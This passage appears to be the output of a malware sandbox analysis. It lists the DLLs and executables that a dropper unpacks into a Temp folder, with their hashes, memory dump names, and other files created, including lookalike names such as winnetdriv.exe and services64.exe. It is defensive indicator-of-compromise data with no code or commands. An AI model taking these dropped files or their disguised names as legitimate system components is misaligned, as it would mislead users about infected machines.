| SHA512 | 4094517094e9bd5c3c22207e2975aa8c14bc1cb5b446b61ee957e64d0117394e9f8a2d8918e4e4ac0da492f2dd57d73e97985968a9e20f5e01d4a4d1f23f1546 |
memory/2576-35-0x000000006FE40000-0x000000006FFC6000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zS406F7727\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
\Users\Admin\AppData\Local\Temp\7zS406F7727\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
memory/2576-31-0x000000006B440000-0x000000006B4CF000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zS406F7727\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
memory/2576-28-0x000000006B280000-0x000000006B2A6000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zS406F7727\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
\Users\Admin\AppData\Local\Temp\7zS406F7727\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
\Users\Admin\AppData\Local\Temp\7zS406F7727\c0f099be1ace2.exe
| MD5 | 13a289feeb15827860a55bbc5e5d498f |
| SHA1 | e1f0a544fcc5b3bc0ab6a788343185ad1ad077ad |
| SHA256 | c5483b2acbb352dc5c9a811d9616c4519f0e07c13905552be5ec869613ada775 |
| SHA512 | 00c225fb1d88920c5df7bb853d32213a91254fb8c57169c58c8b0ffab4501486e24d87e3d8f5665b16e366362cb81deec535d833ed42434fdc31f0400ee7ffa7 |
\Users\Admin\AppData\Local\Temp\7zS406F7727\621c13b77.exe
| MD5 | 80cf471e52dcc848d81092439489f12f |
| SHA1 | 5fc33906263bbb3cbf306e69b9c5ef2260ace7e5 |
| SHA256 | 69e562f8d0968dd248d2d9dc5de0cc42495e06f8b8563b10425bd8064033be1f |
| SHA512 | 958752f053887bd2f9fbd03cd345585deded65228d093499a3d4e94071b0d9073b0ba7924c2d83bb0fe4f7f4d2274a53416fabfcc0bf45892d23eb29d4162131 |
C:\Users\Admin\AppData\Local\Temp\7zS406F7727\6f1aa71747b4a291.exe
| MD5 | 2b32e3fb6d4deb5e9f825f9c9f0c75a6 |
| SHA1 | 2049fdbbe5b72ff06a7746b57582c9faa6186146 |
| SHA256 | 8bd8f7a32de3d979cae2f487ad2cc5a495afa1bfb1c740e337c47d1e2196e1f2 |
| SHA512 | ad811d1882aa33cce0ebbab82e3f2db7596f88392cd9c142aef0b0caa4004afcf0253f25e7a8f228778dd3a2ec43d2028985a3e85807438c5bed3ae4709f9cfa |
C:\Users\Admin\AppData\Local\Temp\7zS406F7727\24ebc9ce784c63.exe
| MD5 | 5866ab1fae31526ed81bfbdf95220190 |
| SHA1 | 75a5e08b3b9ad2dff35dfbbb3ffe8d983c2be25f |
| SHA256 | 9e1a149370efe9814bf2cbd87acfcfa410d1769efd86a9722da4373d6716d22e |
| SHA512 | 8d99ab09e84e4ef309da34be94946cbfcffeb1c0ca49e2452deb738d801e551062ebb134f1b99a9baf03003a8e720d525521ce09aeac341d3cba3fcfbc618fb5 |
C:\Users\Admin\AppData\Local\Temp\7zS406F7727\caa4baaf544.exe
\Users\Admin\AppData\Local\Temp\7zS406F7727\3d1f9c2a6.exe
C:\Users\Admin\AppData\Local\Temp\7zS406F7727\09b9624c6ac9.exe
\Users\Admin\AppData\Local\Temp\7zS406F7727\e4f0738cc5646a38.exe
\Users\Admin\AppData\Local\Temp\7zS406F7727\d55cc0d45c3a05.exe
\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
C:\Windows\winnetdriv.exe
C:\Users\Admin\AppData\Local\Temp\Cab18B1.tmp
C:\Users\Admin\AppData\Local\Temp\Tar18C3.tmp
C:\Users\Admin\AppData\Roaming\services64.exe
C:\Users\Admin\AppData\Local\Temp\7zSBA69.tmp\Install.cmd
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\633SXO0D\favicon[1].png
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC